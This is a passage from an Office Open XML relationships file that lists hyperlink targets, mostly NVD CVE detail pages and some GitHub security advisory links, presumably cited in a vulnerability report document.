Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79748" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-42179" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-11080" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10196" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12744" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12745" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13447" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16310" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18221" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28606" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31020" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35868" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35869" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37003" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37236" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49921" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52111" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55559" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58822" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61516" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62916" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69276" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69408" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69491" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69493" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69496" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69579" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69586" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69590" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69595" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69715" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69730" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69768" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69769" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69819" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69824" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71374" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71376" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71377" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72982" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72983" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75430" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75816" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77647" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77806" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78362" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78509" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78510" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79569" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79570" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79574" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79576" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79577" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82923" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83627" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85504" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85508" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85509" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86184" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86189" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86219" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86304" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19274" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53552" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65669" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84333" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84352" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84353" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85042" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85047" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85050" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85085" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2xp9-vwfh-vxw4" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52777" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75925" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78683" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82533" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86123" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86148" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86149" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86153" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54391" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58376" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16279" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55068" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56705" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62645" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62647" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62928" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66794" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69356" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69657" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70403" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76200" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76201" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77642" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78012" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78676" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78997" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79657" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82526" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84479" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84480" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84695" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85146" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85148" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85154" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85424" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85425" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85426" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85434" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85435" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85437" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85440" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85602" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85672" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86121" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86190" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-9557-234j-7rv9" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-cw2r-r7mw-j3hc" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66047" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67367" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77635" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84189" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84197" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85427" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85614" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9317" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-g64v-qqpg-v37h" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-xx34-6cjg-prh8" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17057" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17207" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18664" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19874" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50152" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55511" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62646" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69641" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73475" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 